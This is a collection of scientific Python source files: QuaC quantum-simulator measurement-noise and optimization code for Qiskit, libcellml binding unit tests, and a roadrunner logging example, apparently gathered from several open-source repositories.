expanded_qubit_meas_mat = sparse.csr_matrix(np.array([1]))
for ind in range(n_qubits):
if qubit == ind:
expanded_qubit_meas_mat = sparse.kron(expanded_qubit_meas_mat,
self._meas_matrices[qubit],
format='csr')
else:
expanded_qubit_meas_mat = sparse.kron(expanded_qubit_meas_mat,
sparse.eye(2),
format='csr')
full_meas_matrices.append(expanded_qubit_meas_mat)
self._full_meas_matrices = full_meas_matrices
```
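The Kronecker expansion in `build_full_measurement_matrices` is easiest to verify on a toy case. Below is a minimal, self-contained sketch (plain NumPy/SciPy, no QuaC dependency; the 2x2 confusion matrices and the two-qubit state are made-up illustration values) showing that applying each qubit's expanded matrix in turn imposes per-qubit readout error on a bitstring probability vector:
```python
import numpy as np
from scipy import sparse

# Hypothetical per-qubit confusion matrices: column j holds P(measured i | prepared j)
meas = [
    np.array([[0.98, 0.05], [0.02, 0.95]]),  # qubit 0
    np.array([[0.99, 0.10], [0.01, 0.90]]),  # qubit 1
]
n_qubits = len(meas)

# Expand each 2x2 matrix to the full 2**n space, mirroring build_full_measurement_matrices
full = []
for qubit in range(n_qubits):
    mat = sparse.csr_matrix(np.array([1]))
    for ind in range(n_qubits):
        factor = meas[qubit] if ind == qubit else sparse.eye(2)
        mat = sparse.kron(mat, factor, format="csr")
    full.append(mat)

# Ideal |00> as a probability column vector; apply both qubits' adjustments
probs = sparse.csr_matrix(np.array([[1.0], [0.0], [0.0], [0.0]]))
for mat in full:
    probs = mat.dot(probs)
print(probs.toarray().ravel())  # [0.9702 0.0098 0.0198 0.0002]
```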
#### File: quac_qiskit/models/quac_gates.py
```python
from qiskit.quantum_info import Operator
class SpecialQuacGates:
"""Contains special gates supported in QuaC"""
@staticmethod
def get_gate_unitary(name: str) -> Operator:
"""Returns a Qiskit operator for various types of QuaC-supported (but not Qiskit-supported)
gates that can be used to construct and add a unitary representing said gate to a Qiskit
circuit.
:param name: the name of the special QuaC-supported gate (czx, cmz, or cxz)
:return: an operator corresponding to the gate name provided. If the name is unrecognized,
a 4x4 identity operator will be returned
"""
if name.lower() == "czx":
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, -1],
[0, 0, 1, 0]
])
elif name.lower() == "cmz":
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]
])
elif name.lower() == "cxz":
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, -1, 0]
])
return Operator([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]
])
```
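Because these gates are returned as plain `Operator` objects, they can be attached to a circuit with Qiskit's generic unitary instruction. A short sketch (assuming `SpecialQuacGates` is re-exported from `quac_qiskit.models` the same way `QuacNoiseModel` is; the circuit itself is illustrative):
```python
from qiskit import QuantumCircuit
from quac_qiskit.models import SpecialQuacGates

qc = QuantumCircuit(2)
qc.h(0)
# Append the QuaC-specific CZX gate as a generic two-qubit unitary
czx = SpecialQuacGates.get_gate_unitary("czx")
qc.unitary(czx, [0, 1], label="czx")
print(qc.draw())
```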
#### File: quac_qiskit/optimization/objective.py
```python
from typing import List
import numpy as np
from qiskit import QuantumCircuit, execute
from qiskit.result import Result
from quac_qiskit.stat import kl_dist_smoothing, discrete_one_samp_ks, get_vec_angle
from quac_qiskit.format import counts_to_list
from quac_qiskit.models import QuacNoiseModel
def kl_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float:
"""Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of
K-L divergence between circuit result distributions for each circuit is computed
:param circuits: a list of QuantumCircuit objects
:param simulation_result: a Qiskit Result object
:param reference_result: a Qiskit Result object
:return: a float representing the total K-L divergence between distributions of all circuits
"""
total_kl_div = 0
for circuit in circuits:
simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit)))
simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator
reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit)))
reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator
total_kl_div += kl_dist_smoothing(reference_dist, simulation_dist, 1e-5)
return total_kl_div
def ks_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float:
"""Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of
K-S distance between circuit result distributions for each circuit is computed
:param circuits: a list of QuantumCircuit objects
:param simulation_result: a Qiskit Result object
:param reference_result: a Qiskit Result object
:return: a float representing the total K-S distance between distributions of all circuits
"""
total_ks_div = 0
for circuit in circuits:
simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit)))
simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator
reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit)))
reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator
total_ks_div += discrete_one_samp_ks(reference_dist, simulation_dist, 8000)[0]
return total_ks_div
def angle_div_sum(circuits: List[QuantumCircuit], simulation_result: Result, reference_result: Result) -> float:
"""Given a set of test circuits and a Qiskit Result object for a simulation and hardware, the sum of
angle distance between circuit result distributions for each circuit is computed
:param circuits: a list of QuantumCircuit objects
:param simulation_result: a Qiskit Result object
:param reference_result: a Qiskit Result object
:return: a float representing the total angle distance between distributions of all circuits
"""
total_angle_div = 0
for circuit in circuits:
simulation_counts = np.array(counts_to_list(simulation_result.get_counts(circuit)))
simulation_dist = simulation_counts / simulation_counts.sum() # normalize if using counts simulator
reference_counts = np.array(counts_to_list(reference_result.get_counts(circuit)))
reference_dist = reference_counts / reference_counts.sum() # normalize if using counts simulator
total_angle_div += get_vec_angle(reference_dist, simulation_dist)
return total_angle_div
def kl_objective_function(noise_model_array: np.array, *args):
"""An objective function to be minimized based on K-L divergence
:param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array()
:param args: QuantumCircuit objects run, the simulator to run on, and the hardware results
:return: a float representing the "loss" over the set of circuits
"""
circuits, backend, reference_result = args
noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits)
simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result()
return kl_div_sum(circuits, simulation_result, reference_result)
def ks_objective_function(noise_model_array: np.array, *args):
"""An objective function to be minimized based on K-S distance
:param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array()
:param args: QuantumCircuit objects run, the simulator to run on, and the hardware results
:return: a float representing the "loss" over the set of circuits
"""
circuits, backend, reference_result = args
noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits)
simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result()
return ks_div_sum(circuits, simulation_result, reference_result)
def angle_objective_function(noise_model_array: np.array, *args):
"""An objective function to be minimized based on angle divergence
:param noise_model_array: a Numpy array generated via QuacNoiseModel.to_array()
:param args: QuantumCircuit objects run, the simulator to run on, and the hardware results
:return: a float representing the "loss" over the set of circuits
"""
circuits, backend, reference_result = args
noise_model = QuacNoiseModel.from_array(noise_model_array, backend.configuration().n_qubits)
simulation_result = execute(circuits, backend, shots=1, quac_noise_model=noise_model).result()
return angle_div_sum(circuits, simulation_result, reference_result)
```
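These objective functions are shaped for SciPy's optimizers: the flat parameter vector comes first and the remaining context is threaded through `args`. A hedged sketch of that wiring (the four-argument `QuacNoiseModel` constructor is inferred from its use above; the re-export of `kl_objective_function` from `quac_qiskit.optimization` is assumed; `circuits`, `backend`, and `reference_result` are assumed to exist as described in the docstrings, and the starting T1/T2 guesses are made up):
```python
from scipy.optimize import minimize
from quac_qiskit.models import QuacNoiseModel
from quac_qiskit.optimization import kl_objective_function

n_qubits = backend.configuration().n_qubits
# Illustrative starting guess: 50/70 us T1/T2 (in ns), no measurement or ZZ terms
x0 = QuacNoiseModel([50e3] * n_qubits, [70e3] * n_qubits, None, None).to_array()

result = minimize(
    kl_objective_function,                      # or ks_/angle_objective_function
    x0,
    args=(circuits, backend, reference_result),
    method="Nelder-Mead",                       # derivative-free; the loss is noisy
)
fitted_model = QuacNoiseModel.from_array(result.x, n_qubits)
```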
#### File: quac_qiskit/simulators/quac_density_simulator.py
```python
import time
import numpy as np
from scipy import sparse
from collections import defaultdict
from qiskit.result import Result
from qiskit.qobj.qasm_qobj import QasmQobj
from qiskit.providers.models.backendproperties import BackendProperties
from quac_qiskit.simulators import QuacSimulator
class QuacDensitySimulator(QuacSimulator):
"""Class for simulating a Qiskit-defined quantum experiment and computing the diagonal of its
density matrix
"""
def name(self) -> str:
"""Returns a name for identifying this specific density backend
:return: a string used to identify this backend
"""
return self.configuration().backend_name + "_density_simulator"
def properties(self) -> BackendProperties:
"""Returns backend properties that reflect the limitations of the hardware if it is
specified or the QuaC simulator if not
:return: a Qiskit BackendProperties object
"""
return self._properties
def _run_job(self, job_id: str, qobj: QasmQobj, **run_config) -> Result:
"""Specifies how to run a quantum object job on this backend. This is the method that
changes between types of QuaC backends.
:param job_id: a uuid4 string to uniquely identify this job
:param qobj: an assembled quantum object of experiments
:param run_config: injected parameters
:return: a Qiskit Result object
"""
qobj_start = time.perf_counter()
results = list()
# Update noise model if injected
job_noise_model = self._quac_noise_model
if run_config.get("quac_noise_model"):
job_noise_model = run_config.get("quac_noise_model")
for experiment in qobj.experiments:
exp_start = time.perf_counter()
final_quac_instance, qubit_measurements = super()._run_experiment(experiment, **run_config)
# Create a frequency defaultdict for multinomial experiment tallying
frequencies = defaultdict(lambda: 0)
# Get probabilities of all states occurring and try to adjust them by measurement errors
bitstring_probs = sparse.csr_matrix(final_quac_instance.get_bitstring_probs()).transpose()
if job_noise_model.has_meas():
# If measurement error simulation is turned on, adjust probabilities accordingly
for expanded_qubit_meas_mat in job_noise_model.meas():
bitstring_probs = expanded_qubit_meas_mat.dot(bitstring_probs)  # np.dot is not sparse-aware
# Switch probability list least significant bit convention and add to dictionary
for decimal_state in range(bitstring_probs.shape[0]):
binary_state = bin(decimal_state)[2:]
state_prob = bitstring_probs.toarray()[decimal_state][0]
padded_outcome_state = list(binary_state.zfill(qobj.config.n_qubits))
classical_register = ["0"] * qobj.config.memory_slots
for qubit, outcome in enumerate(padded_outcome_state):
# Only measure specified qubits into the classical register
if qubit in qubit_measurements:
for register_slot in qubit_measurements[qubit]:
classical_register[register_slot] = outcome
classical_register.reverse() # convert to Qiskit MSB format
classical_register_hex = hex(int(''.join(classical_register), 2))
frequencies[classical_register_hex] += state_prob
results.append({
"name": experiment.header.name,
"shots": qobj.config.shots,
"data": {"counts": dict(frequencies)},
"status": "DONE",
"success": True,
"time_taken": time.perf_counter() - exp_start,
"header": experiment.header.to_dict()
})
job_result = {
"backend_name": self.name(),
"backend_version": self.configuration().backend_version,
"qobj_id": qobj.qobj_id,
"job_id": job_id,
"results": results,
"success": True,
"time_taken": time.perf_counter() - qobj_start,
"header": qobj.header.to_dict()
}
return Result.from_dict(job_result)
```
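The inner loop that turns a probability-vector index into a Qiskit-style hex count key does two things at once: it routes each measured qubit's outcome into its classical slot and then flips to Qiskit's most-significant-bit-first convention. The same mapping, isolated as a standalone sketch (the register layout is a made-up example):
```python
def state_index_to_hex(decimal_state, n_qubits, memory_slots, qubit_measurements):
    """Mirror the classical-register packing done in QuacDensitySimulator._run_job."""
    padded = list(bin(decimal_state)[2:].zfill(n_qubits))
    register = ["0"] * memory_slots
    for qubit, outcome in enumerate(padded):
        for slot in qubit_measurements.get(qubit, []):
            register[slot] = outcome
    register.reverse()  # Qiskit count keys are MSB-first
    return hex(int("".join(register), 2))

# Example: three qubits, qubit i measured into classical slot i
print(state_index_to_hex(5, 3, 3, {0: [0], 1: [1], 2: [2]}))  # 0x5
```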
#### File: quac_qiskit/stat/util.py
```python
from typing import List, Union
import random
import numpy as np
def choose_index(prob_dist: Union[List[float], np.array]) -> int:
"""Chooses an index i from a list l with probability l[i]
:param prob_dist: a list of floating point probabilities
:type prob_dist: List[float]
:return: an integer representing the chosen index
"""
chooser = random.random()
upper_limit = 0
lower_limit = 0
for i, prob in enumerate(prob_dist):
upper_limit += prob
if lower_limit <= chooser < upper_limit:
return i
lower_limit += prob
# return -1 # TODO: update when bitstring bug is fixed
return 0
``` |
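For reference, `choose_index` behaves like one draw from a categorical distribution, so its output frequencies should converge on the input probabilities. A quick sanity-check sketch (assuming `choose_index` is importable from `quac_qiskit.stat` alongside the helpers imported earlier):
```python
from collections import Counter
from quac_qiskit.stat import choose_index

dist = [0.2, 0.5, 0.3]
draws = Counter(choose_index(dist) for _ in range(10_000))
print({i: draws[i] / 10_000 for i in range(len(dist))})  # roughly {0: 0.2, 1: 0.5, 2: 0.3}
```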
{
"source": "0u812/libcellml",
"score": 3
} |
#### File: bindings/python/test_component.py
```python
import unittest
class ComponentTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Component
# Test create/copy/destroy
x = Component()
del(x)
y = Component()
z = Component(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Component
x = Component()
self.assertIsInstance(x, libcellml.ComponentEntity)
self.assertIsInstance(x, libcellml.ImportedEntity)
self.assertIsInstance(x, libcellml.NamedEntity)
self.assertIsInstance(x, libcellml.Entity)
def test_inherited_methods(self):
from libcellml import Component
x = Component()
idx = 'test'
self.assertEqual(x.id(), '')
x.setId(idx)
self.assertEqual(x.id(), idx)
y = Component(x)
self.assertEqual(y.id(), idx)
def test_set_source(self):
from libcellml import Component, ImportSource
x = Component()
i = ImportSource()
i.setUrl('bonjour')
x.setSourceComponent(i, 'camembert')
self.assertEqual(x.importSource().url(), 'bonjour')
self.assertEqual(x.importReference(), 'camembert')
def test_math(self):
from libcellml import Component
# appendMath(const std::string &math)
x = Component()
x.appendMath('More maths')
x.appendMath(' please!')
# std::string math()
self.assertEqual(x.math(), 'More maths please!')
x = Component()
self.assertEqual(x.math(), '')
# void setMath(const std::string &math)
x.setMath('bonjour')
self.assertEqual(x.math(), 'bonjour')
x.setMath('hola')
self.assertEqual(x.math(), 'hola')
def test_add_variable(self):
from libcellml import Component, Variable
c = Component()
v = Variable()
c.addVariable(v)
def test_has_variable(self):
from libcellml import Component, Variable
# bool hasVariable(const VariablePtr &variable)
c = Component()
v = Variable()
self.assertFalse(c.hasVariable(v))
c.addVariable(v)
self.assertTrue(c.hasVariable(v))
self.assertFalse(c.hasVariable(Variable()))
del(c, v)
# bool hasVariable(const std::string &name)
c = Component()
self.assertFalse(c.hasVariable(''))
v1 = Variable()
c.addVariable(v1)
self.assertFalse(c.hasVariable('blue'))
self.assertTrue(c.hasVariable(''))
name = 'yellow'
v2 = Variable()
v2.setName(name)
c.addVariable(v2)
self.assertTrue(c.hasVariable(name))
del(c, v1, v2, name)
def test_remove_variable(self):
from libcellml import Component, Variable
# bool removeVariable(size_t index)
c = Component()
self.assertFalse(c.removeVariable(0))
self.assertFalse(c.removeVariable(-1))
self.assertFalse(c.removeVariable(1))
c.addVariable(Variable())
self.assertFalse(c.removeVariable(-1))
self.assertFalse(c.removeVariable(1))
self.assertTrue(c.removeVariable(0))
self.assertFalse(c.removeVariable(0))
del(c)
# bool removeVariable(const std::string &name)
c = Component()
self.assertFalse(c.removeVariable(''))
v1 = Variable()
c.addVariable(v1)
self.assertTrue(c.removeVariable(''))
self.assertFalse(c.removeVariable(''))
name = 'blue'
v1.setName(name)
self.assertFalse(c.removeVariable(name))
c.addVariable(v1)
self.assertTrue(c.removeVariable(name))
self.assertFalse(c.removeVariable(name))
del(c, v1, name)
# bool removeVariable(const VariablePtr &variable)
c = Component()
v1 = Variable()
v2 = Variable()
self.assertFalse(c.removeVariable(v1))
c.addVariable(v1)
self.assertFalse(c.removeVariable(v2))
self.assertTrue(c.removeVariable(v1))
self.assertFalse(c.removeVariable(v1))
def test_remove_all_variables(self):
from libcellml import Component, Variable
# void removeAllVariables()
c = Component()
v1 = Variable()
v2 = Variable()
c.addVariable(v1)
c.addVariable(v2)
self.assertTrue(c.hasVariable(v1))
self.assertTrue(c.hasVariable(v2))
c.removeAllVariables()
self.assertFalse(c.hasVariable(v1))
self.assertFalse(c.hasVariable(v2))
def test_variable(self):
from libcellml import Component, Variable
# VariablePtr variable(size_t index)
c = Component()
v = Variable()
name = 'green'
v.setName(name)
self.assertIsNone(c.variable(0))
self.assertIsNone(c.variable(1))
self.assertIsNone(c.variable(-1))
c.addVariable(v)
self.assertIsNone(c.variable(1))
self.assertIsNone(c.variable(-1))
self.assertIsNotNone(c.variable(0))
self.assertEqual(c.variable(0).name(), name)
del(c, v, name)
# VariablePtr variable(const std::string &name)
c = Component()
v = Variable()
name = 'green'
v.setName(name)
self.assertIsNone(c.variable(name))
c.addVariable(v)
self.assertIsNone(c.variable('red'))
self.assertIsNotNone(c.variable(name))
self.assertEqual(c.variable(name).name(), name)
def test_variable_count(self):
from libcellml import Component, Variable
# size_t variableCount()
c = Component()
self.assertEqual(c.variableCount(), 0)
c.addVariable(Variable())
self.assertEqual(c.variableCount(), 1)
c.addVariable(Variable())
self.assertEqual(c.variableCount(), 2)
c.removeVariable('')
self.assertEqual(c.variableCount(), 1)
c.removeVariable('')
self.assertEqual(c.variableCount(), 0)
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_imported_entity.py
```python
import unittest
class ImportedEntityTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import ImportedEntity
x = ImportedEntity()
y = ImportedEntity()
z = ImportedEntity(y)
del(x, y, z)
def test_set_import_source(self):
from libcellml import ImportedEntity, ImportSource
# void setImportSource(const ImportPtr &imp)
x = ImportedEntity()
x.setImportSource(ImportSource())
x.setImportSource(None)
def test_is_import(self):
from libcellml import ImportedEntity, ImportSource
# bool isImport()
x = ImportedEntity()
self.assertFalse(x.isImport())
x.setImportSource(ImportSource())
self.assertTrue(x.isImport())
x.setImportSource(None)
self.assertFalse(x.isImport())
def test_import_source(self):
from libcellml import ImportedEntity, ImportSource
# ImportSourcePtr importSource()
i = ImportSource()
source = 'hello'
i.setUrl(source)
x = ImportedEntity()
self.assertIsNone(x.importSource())
x.setImportSource(i)
self.assertIsNotNone(x.importSource())
self.assertEqual(x.importSource().url(), source)
def test_set_import_reference(self):
from libcellml import ImportedEntity
# void setImportReference(const std::string &reference)
r = 'yes'
x = ImportedEntity()
x.setImportReference('')
x.setImportReference(r)
x.setImportReference('')
def test_import_reference(self):
from libcellml import ImportedEntity
# std::string importReference()
r = 'yes'
x = ImportedEntity()
self.assertEqual(x.importReference(), '')
x.setImportReference(r)
self.assertEqual(x.importReference(), r)
x.setImportReference('')
self.assertEqual(x.importReference(), '')
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_import_source.py
```python
import unittest
class ImportSourceTestCase(unittest.TestCase):
def test_import_source(self):
from libcellml import ImportSource
# Test create/copy/destroy
x = ImportSource()
y = ImportSource()
z = ImportSource(y)
del(x, y, z)
def test_inheritance(self):
import libcellml
from libcellml import ImportSource
x = ImportSource()
self.assertIsInstance(x, libcellml.Entity)
def test_set_url(self):
from libcellml import ImportSource
# void setUrl(const std::string &reference)
x = ImportSource()
x.setUrl('')
x.setUrl('hello')
x.setUrl('')
def test_url(self):
from libcellml import ImportSource
# std::string url()
source = 'cheers'
x = ImportSource()
self.assertEqual(x.url(), '')
x.setUrl(source)
self.assertEqual(x.url(), source)
x.setUrl('')
self.assertEqual(x.url(), '')
def test_set_model(self):
from libcellml import ImportSource, Model
# void setModel(const ModelPtr &model);
x = ImportSource()
x.setModel(None)
x.setModel(Model())
x.setModel(None)
def test_model(self):
from libcellml import ImportSource, Model
# ModelPtr model() const;
model = Model()
model.setName('bert')
x = ImportSource()
self.assertIsNone(x.model())
x.setModel(model)
self.assertEqual(x.model().name(), model.name())
x.setModel(None)
self.assertIsNone(x.model())
def test_has_model(self):
from libcellml import ImportSource, Model
# bool hasModel() const;
x = ImportSource()
self.assertFalse(x.hasModel())
x.setModel(Model())
self.assertTrue(x.hasModel())
x.setModel(None)
self.assertFalse(x.hasModel())
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_logger.py
```python
import unittest
class LoggerTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Logger
# Test create/copy/destroy
x = Logger()
del(x)
y = Logger()
z = Logger(y)
del(y, z)
def test_add_error(self):
from libcellml import Logger, Error
# void addError(const ErrorPtr error)
x = Logger()
x.addError(Error())
def test_error_count(self):
from libcellml import Logger, Error
# size_t errorCount()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
self.assertEqual(x.errorCount(), 1)
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
def test_error(self):
from libcellml import Logger, Error
# ErrorPtr error(size_t index)
x = Logger()
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertIsNone(x.error(-1))
e = Error()
e.setKind(Error.Kind.MODEL)
x.addError(e)
self.assertIsNotNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertEqual(x.error(0).kind(), Error.Kind.MODEL)
def test_clear_errors(self):
from libcellml import Logger, Error
# void clearErrors()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
x.clearErrors()
self.assertEqual(x.errorCount(), 0)
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_model.py
```python
import unittest
class ModelTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Model
x = Model()
del(x)
y = Model()
z = Model(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Model
x = Model()
self.assertIsInstance(x, libcellml.ComponentEntity)
self.assertIsInstance(x, libcellml.NamedEntity)
self.assertIsInstance(x, libcellml.Entity)
# Test access to inherited methods
x = Model()
idx = 'test'
self.assertEqual(x.id(), '')
x.setId(idx)
self.assertEqual(x.id(), idx)
y = Model(x)
self.assertEqual(y.id(), idx)
def test_add_units(self):
from libcellml import Model, Units
# void addUnits(const UnitsPtr &units)
m = Model()
u = Units()
m.addUnits(u)
def test_remove_units(self):
from libcellml import Model, Units
# bool removeUnits(size_t index)
m = Model()
u = Units()
self.assertFalse(m.removeUnits(0))
self.assertFalse(m.removeUnits(1))
self.assertFalse(m.removeUnits(-1))
m.addUnits(u)
self.assertFalse(m.removeUnits(1))
self.assertFalse(m.removeUnits(-1))
self.assertTrue(m.removeUnits(0))
self.assertFalse(m.removeUnits(0))
del(m, u)
# bool removeUnits(const std::string &name)
name = 'bert'
m = Model()
u = Units()
u.setName(name)
self.assertFalse(m.removeUnits(name))
m.addUnits(u)
self.assertFalse(m.removeUnits('ernie'))
self.assertTrue(m.removeUnits(name))
del(m, u, name)
# bool removeUnits(const UnitsPtr &units)
m = Model()
u1 = Units()
u2 = Units()
self.assertFalse(m.removeUnits(u1))
m.addUnits(u1)
self.assertFalse(m.removeUnits(u2))
self.assertTrue(m.removeUnits(u1))
self.assertFalse(m.removeUnits(u1))
del(m, u1, u2)
def test_remove_all_units(self):
from libcellml import Model, Units
# void removeAllUnits()
m = Model()
u1 = Units()
u2 = Units()
m.addUnits(u1)
m.addUnits(u2)
m.removeAllUnits()
self.assertFalse(m.removeUnits(u1))
self.assertFalse(m.removeUnits(u2))
del(m, u1, u2)
def test_has_units(self):
from libcellml import Model, Units
# bool hasUnits(const std::string &name)
name = 'loud'
m = Model()
u = Units()
u.setName(name)
m.addUnits(u)
self.assertFalse(m.hasUnits('hi'))
self.assertTrue(m.hasUnits(name))
# bool hasUnits(const UnitsPtr &units)
self.assertTrue(m.hasUnits(u))
v = Units()
self.assertFalse(m.hasUnits(v))
def test_units(self):
from libcellml import Model, Units
# UnitsPtr units(size_t index)
name = 'naaame'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.units(0))
self.assertIsNone(m.units(1))
self.assertIsNone(m.units(-1))
m.addUnits(u)
self.assertIsNone(m.units(1))
self.assertIsNone(m.units(-1))
self.assertIsNotNone(m.units(0))
self.assertEqual(m.units(0).name(), name)
del(m, u, name)
# UnitsPtr units(const std::string &name)
name = 'kermit'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.units(name))
m.addUnits(u)
self.assertIsNotNone(m.units(name))
self.assertEqual(m.units(name).name(), name)
del(m, u, name)
def test_take_units(self):
from libcellml import Model, Units
# UnitsPtr takeUnits(size_t index)
name = 'piggy'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.takeUnits(0))
self.assertIsNone(m.takeUnits(-1))
self.assertIsNone(m.takeUnits(1))
m.addUnits(u)
self.assertIsNone(m.takeUnits(-1))
self.assertIsNone(m.takeUnits(1))
self.assertIsNotNone(m.takeUnits(0))
self.assertIsNone(m.takeUnits(0))
m.addUnits(Units())
m.addUnits(u)
self.assertEqual(m.takeUnits(1).name(), name)
del(m, u)
# UnitsPtr takeUnits(const std::string &name)
name = 'aloha'
m = Model()
u = Units()
u.setName(name)
self.assertIsNone(m.takeUnits(name))
m.addUnits(u)
self.assertEqual(m.takeUnits(name).name(), name)
self.assertIsNone(m.takeUnits(name))
del(m, u, name)
def test_replace_units(self):
from libcellml import Model, Units
# bool replaceUnits(size_t index, const UnitsPtr &units)
m = Model()
u1 = Units()
u1.setName('a')
m.addUnits(u1)
u2 = Units()
u2.setName('b')
self.assertTrue(m.replaceUnits(0, u2))
self.assertFalse(m.replaceUnits(1, u1))
self.assertFalse(m.replaceUnits(-1, u1))
self.assertEqual(m.units(0).name(), 'b')
del(m, u1, u2)
# bool replaceUnits(const std::string &name, const UnitsPtr &units)
m = Model()
a = Units()
a.setName('a')
m.addUnits(a)
b = Units()
b.setName('b')
self.assertFalse(m.replaceUnits('b', a))
self.assertTrue(m.replaceUnits('a', b))
self.assertTrue(m.replaceUnits('b', a))
self.assertFalse(m.replaceUnits('b', a))
del(m, a, b)
# bool replaceUnits(const UnitsPtr &oldUnits, const UnitsPtr &newUnits)
m = Model()
a = Units()
m.addUnits(a)
b = Units()
self.assertFalse(m.replaceUnits(b, a))
self.assertTrue(m.replaceUnits(a, b))
self.assertTrue(m.replaceUnits(b, a))
self.assertFalse(m.replaceUnits(b, a))
del(m, a, b)
def test_units_count(self):
from libcellml import Model, Units
# size_t unitsCount()
m = Model()
self.assertEqual(m.unitsCount(), 0)
m.addUnits(Units())
self.assertEqual(m.unitsCount(), 1)
m.addUnits(Units())
self.assertEqual(m.unitsCount(), 2)
m.removeAllUnits()
self.assertEqual(m.unitsCount(), 0)
del(m)
def test_has_unresolved_imports(self):
from libcellml import Model, Component, ImportSource
# bool hasUnresolvedImports();
m = Model()
self.assertFalse(m.hasUnresolvedImports())
c = Component()
m.addComponent(c)
self.assertFalse(m.hasUnresolvedImports())
c.setImportSource(ImportSource())
self.assertTrue(m.hasUnresolvedImports())
def test_resolve_imports(self):
from libcellml import Model
m = Model()
m.resolveImports('file.txt')
if __name__ == '__main__':
unittest.main()
```
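Taken together, the calls these tests exercise are enough to assemble a small model by hand. A sketch using only API shown above (names and ids are arbitrary):
```python
from libcellml import Component, Model, Units, Variable

m = Model()
m.setId('demo_model')

u = Units()
u.setName('millivolt')
m.addUnits(u)

c = Component()
c.setId('membrane')
v = Variable()
v.setName('V')
c.addVariable(v)
m.addComponent(c)

assert m.hasUnits('millivolt')
assert c.hasVariable('V')
print(m.unitsCount(), c.variableCount())  # 1 1
```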
#### File: bindings/python/test_parser.py
```python
import unittest
class ParserTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Parser
x = Parser()
del(x)
y = Parser()
z = Parser(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Parser
x = Parser()
self.assertIsInstance(x, libcellml.Logger)
# Test access to inherited methods
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(-1))
self.assertEqual(x.errorCount(), 0)
x.addError(libcellml.Error())
self.assertEqual(x.errorCount(), 1)
def test_parse_model(self):
import libcellml
from libcellml import Parser
# ModelPtr parseModel(const std::string &input)
p = Parser()
self.assertIsInstance(p.parseModel('rubbish'), libcellml.Model)
if __name__ == '__main__':
unittest.main()
```
#### File: bindings/python/test_validator.py
```python
import unittest
class ValidatorTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Validator
x = Validator()
del(x)
y = Validator()
z = Validator(y)
del(y, z)
def test_inheritance(self):
import libcellml
from libcellml import Validator
# Test inheritance
x = Validator()
self.assertIsInstance(x, libcellml.Logger)
# Test access to inherited methods
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(-1))
self.assertEqual(x.errorCount(), 0)
x.addError(libcellml.Error())
self.assertEqual(x.errorCount(), 1)
def test_validate_model(self):
import libcellml
from libcellml import Validator
# void validateModel(const ModelPtr &model)
v = Validator()
v.validateModel(libcellml.Model())
if __name__ == '__main__':
unittest.main()
``` |
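The Parser and Validator tests compose directly into the usual parse-then-validate loop; a minimal sketch built only from calls the tests demonstrate (the input string is deliberately invalid, as in test_parse_model):
```python
import libcellml

parser = libcellml.Parser()
model = parser.parseModel('rubbish')  # invalid input still yields a Model
print('parse errors:', parser.errorCount())
for i in range(parser.errorCount()):
    print('  kind:', parser.error(i).kind())

validator = libcellml.Validator()
validator.validateModel(model)
print('validation errors:', validator.errorCount())
```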
{
"source": "0u812/roadrunner",
"score": 2
} |
#### File: roadrunner/examples/logging.py
```python
import roadrunner as rr
rr.Logger.setLevel(rr.Logger.LOG_TRACE)
def log():
rr.Logger.log(rr.Logger.LOG_FATAL, "A fatal message")
rr.Logger.log(rr.Logger.LOG_CRITICAL, "A critical message")
rr.Logger.log(rr.Logger.LOG_ERROR, "An error message")
rr.Logger.log(rr.Logger.LOG_WARNING, "A warning message")
rr.Logger.log(rr.Logger.LOG_NOTICE, "A notice message")
rr.Logger.log(rr.Logger.LOG_INFORMATION, "An informational message")
rr.Logger.log(rr.Logger.LOG_DEBUG, "A debugging message.")
